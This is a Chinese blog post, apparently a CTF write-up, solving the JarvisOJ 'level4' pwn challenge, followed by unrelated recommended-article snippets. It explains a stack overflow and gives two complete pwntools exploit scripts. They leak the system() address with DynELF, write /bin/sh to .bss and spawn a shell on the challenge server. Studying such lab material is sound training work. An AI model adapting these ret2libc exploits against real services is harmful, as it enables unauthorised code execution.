DROPS第二周周五

最新推荐文章于 2021-10-20 16:40:59 发布
最新推荐文章于 2021-10-20 16:40:59 发布
阅读量86 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_39153421/article/details/89709669

OJ level4(DynELF泄露system地址)

nc pwn2.jarvisoj.com 9880

链接:https://dn.jarvisoj.com/challengefiles/level4.0f9cfa0b7bb6c0f9e030a5541b46e9f0

下载后,只有一个程序,ida查看没有sys ,没有/bin/sh,而且没有给libc库:这可怎么办?
上网查了说要用DynELF泄露system地址,下面了解一下DynELF:

很好的一个例子:https://blog.youkuaiyun.com/smalosnail/article/details/53386353

开了NX保护

溢出点在read函数:

当然leak啦(其实就是换一种方法获取system的真实地址)然后再想着法子把/bin/sh给写到bss或者data里

构造leak函数:
def leak(address):
payload1 = "A" * 140 + p32(write_plt) + p32(main) + p32(1) + p32(address) + p32(4)
p.sendline(payload1)
data = p.recv(4)
log.info("%#x => %s" % (address, (data or '').encode('hex')))
return data

这段函数能从内存中address处dump出4字节数据,函数执行结束后会返回main函数重新执行,也就是说利用这个函数,我们可以dump出整个libc

使用DynELF模块查找system函数地址:
d = DynELF(leak, elf=ELF('./001'))
system_addr= d.lookup('system', 'libc')

获取到system地址后便可以构造system(“/bin/sh”);攻击程序。由于程序中没有/bin/sh这个字符串,我们可以用read函数先它写入内存中一个固定的位置,然后再执行system函数

bss段在内存中的位置是固定的,所以可以将/bin/sh写到bss段中,payload如下:

'B' * 140 + p32(read_plt) + p(ret1) + p32(0) + p32(bss_addr) + p32(8) + p32(system_addr) + p32(ret2) + p32(bss_addr)

现在栈中的情况如图:

EXP:

from pwn import *
io=remote("pwn2.jarvisoj.com",9880)
elf=ELF("./level4")
vuln=0x804844B
writeplt=elf.plt["write"]
readplt=elf.plt["read"]
bss_addr=elf.bss()#获取bss地址,将参数/bin/sh写入bss段上去
def leak(address):
payload="a"*0x88+"aaaa"+p32(writeplt)+p32(vuln)+p32(1)+p32(address)+p32(4)
io.sendline(payload)
leak_sysaddr=io.recv(4)
return leak_sysaddr
d = DynELF(leak, elf=ELF("./level4"))#DynELF泄露system地址
sysaddr=d.lookup("system","libc")
payload1="a"*0x88+"aaaa"+p32(readplt)+p32(vuln)+p32(1)+p32(bss_addr)+p32(8)
io.sendline(payload1)
io.sendline("/bin/sh")#将参数/bin/sh写入bss段上去
payload2="a"*0x88+"aaaa"+p32(sysaddr)+p32(vuln)+p32(bss_addr)
io.sendline(payload2)
io.interactive()
#CTF{882130cf51d65fb705440b218e94e98e}

EXP2:(ROP链)

from pwn import *
# sh = process("./level4")
sh = remote("pwn2.jarvisoj.com",9880)
elf = ELF("./level4")
# plt
read_plt = elf.plt["read"]
write_plt = elf.plt["write"]
# got
read_got = elf.got["read"]
write_got = elf.got["write"]
# some addrss
vulfun_addr = elf.symbols["main"]
pop3ret = 0x08048509
# leak the address of system
junk = "a"*0x88
fakebp = "a"*4
def leak(address):  
payload = junk + fakebp
payload += p32(write_plt) + p32(pop3ret)
payload += p32(1) + p32(address) + p32(4) + p32(vulfun_addr)
sh.send(payload)
data = sh.recv(4)
#print "%#x %s" % (address, data)
return data
d = DynELF(leak, elf=ELF("./level4"))
system_addr = d.lookup("system","libc")
print "system address: " + hex(system_addr)
# read bss
bss_addr = elf.bss()
payload1 = junk + fakebp
payload1 += p32(read_plt) + p32(pop3ret)
payload1 += p32(0) + p32(bss_addr) + p32(8)
payload1 += p32(system_addr) + p32(vulfun_addr) + p32(bss_addr)
# send paylaod and /bin/sh
sh.send(payload1)
sh.send("/bin/sh\0")
sh.interactive()

你的支持是我最大的动力!

2.jpg支付宝
1.png微信
一梦不醒
关注
Pwn-最简单栈溢出(2018铁三云贵赛区)write函数泄露+用地址跳回重执行主函数
publicStr的博客
05-16 4719
开始前的例行叨叨:这大概是最简单的pwn题了吧,直接溢出的。主要是记录下write函数泄露动态地址的姿势,还有程序执行完一次就退出了,如何在溢出的末尾让它重执行,以及从lic中提取地址的姿势。...
lstm 能耗预测_预测能耗第一部分
weixin_26705651的博客
08-21 3933
lstm 能耗预测An Introduction to Time Series Analysis and Forecasting Using Python 使用Python进行时间序列分析和预测的简介 时间序列分析与预测 (Time Series Analysis & Forecasting) Time series data refers to a set of observatio...
Python定时任务框架APScheduler
XerCis的博客
10-20 4060
APScheduler是一个Python定时任务框架,功能通用,可发起基于日期、时间间隔以及Corntab的任务,动态管理任务,任务可存储在数据库,重启后自动执行
深圳面试一周记录——.NET(B/S)开发
weixin_30613433的博客
09-21 357
个人简单信息:2011年毕业,最高学历大专,最近一份工作在广州;有做架构设计经验,有一年的带团队(10人左右)经验;互联网和行业软件公司都待过。 为免不必要的争论,本文说地址的就不说公司行业,说公司行业就不说地址了。另外offer薪水以第一家公司给的为基数,之后的称为”1.1倍基数”这样。 2014-09-15(周一)上午十点 相关信息: 公司在智恒产业园,就是坐公交到南头检查站(入...
linux每个任务运行时间,Linux基础教程:任务计划和周期性任务
weixin_35757736的博客
05-01 538
在我们的生活中,有的工作是例行的,例如每年一次加薪、每年给女朋友过一次生日、每天上班都要打卡等,有的工作是临时发生的,例如明天朋友要来访,你需要准备午餐等等。像很多例行的工作,你一旦忙起来就很容易忘记,这时候就需要人去提醒你,Linux的crontab功能就能够排上用场了,例如每年女朋友的生日前一天给你发个邮件提醒你,好让你有所准备。临时发生的事情,例如上面那个例子,明天朋友要来访,在第二天的上午...
程序员价值观和网络复杂性-网络不可达排查过程
TCP/IP
09-04 7058
声明:由于涉及到公网拓扑以及公司内部信息,本文中的IP地址一律采用化名。序周三由于吃了可能已经坏掉的生蚝,周四开始腹泻并发烧,周四晚上开始高烧,并持续到周五晚上,没去医院没吃药,死磕,对,死磕,然后在周六白天断断续续高烧低烧相间后,到了晚上看完同事介绍的电影《异度空间》后,好了,生病期间,没有工作,但是却断断续续写了一些技术随笔,算是《病中吟》吧...        其实,生病挺好的,对我而言,发
Linux面试题
dieqms的专栏
11-13 638
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> 1,如果使用Bourne shell,那么用户退出时,所有正在运行的后台进程将理所当然的被终止。 为了避免发生这种情况,可以使用 命令。 nohup comma
其他公司的笔试题8
程序员笔试题解答
11-22 5134
 我面试一家LINUX公司的笔试答卷!应聘系统管理员1,如果使用Bourne   shell,那么用户退出时,所有正在运行的后台进程将理所当然的被终止。    为了避免发生这种情况,可以使用             命令。        nohup    2,以下哪些shell在用户退出时,所有正在运行的后台进程不会被关闭?    A,bash   B,  tcsh    
乌云文章Drops离线版打包大全
08-02
【乌云文章Drops离线版打包大全】是一款集合了大量信息安全相关文章的资源包,主要涵盖的是“乌云”平台上的Drops模块内容。乌云,全称为“WooYun”,是一个专注于互联网安全问题反馈与分享的平台,自2010年成立以来...
Cloud Drops-开源
05-02
有了这个程序,您可以在您的保管箱帐户中找到您的Mp3文件,并通过流在设备上播放它们。 您无需将歌曲下载到设备上,因此不必担心空间。 在运行4.0及更高版本的Android上运行
GA_Ten_Drops.rar_ten drops_十滴水_智能滴水算法
09-14
本资料包“GA_Ten_Drops.rar”正是以此为背景,探讨如何运用遗传算法解决“十滴水”问题,这是一个经典的策略游戏,也常被用作算法设计的实践案例。 “十滴水”游戏的目标是使一定数量的水滴(通常为十滴)在有限的...
drops:Drops只能播放样本
04-05
Drops只能播放样本 Drops是单个音频文件采样器。 加载音频文件,播放,循环播放,变调并将其制作成全新的文件。 计划功能集 样本播放: 加载并播放单个音频文件 设置样本根密钥 以图形方式设置起点,终点和循环点 ...
Excel表格通用模板:2000平方宾馆装修预算表.xls
09-10
Excel表格通用模板:2000平方宾馆装修预算表.xls
preludedb-tools-5.2.0-1.el8.tar.gz
09-10
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
计算机教学年度工作总结.doc
09-10
计算机教学年度工作总结.doc
网络推广方案:知己知彼-了解行业数据.doc
最新发布
09-10
网络推广方案:知己知彼-了解行业数据.doc
ppl-devel-1.2-24.el8.tar.gz
09-10
# 适用操作系统:Centos8 #Step1、解压 tar -zxvf xxx.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
b/w exceed drops
06-08
B/W Exceed Drops, 或者称为 Bandwidth Exceeded Drops,通常指的是在网络通信中遇到的一种问题。当网络流量超过了带宽限制时,可能会触发这种类型的丢包(Packet Drops)。带宽是网络连接所能传输数据的最大速率,如果短时间内传输的数据量超过了这个限制,路由器或交换机会为了保护网络的稳定性,会实施流量控制机制,临时停止接收超过带宽阈值的数据包。 具体表现可能包括: 1. **拥塞控制**:网络在处理大量数据时可能会变得拥挤,服务商会设置策略,如TCP的重传机制,将一些数据包标记为“丢失”,并要求源头减缓发送速度。 2. **QoS(服务质量)设置**:一些高级网络配置可能优先保证关键服务的带宽使用,非关键服务可能会受到带宽限制,导致部分流量被丢弃。 3. **防火墙或安全策略**:防火墙可能会在检测到可疑活动或超出安全策略的流量时,自动丢弃数据包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值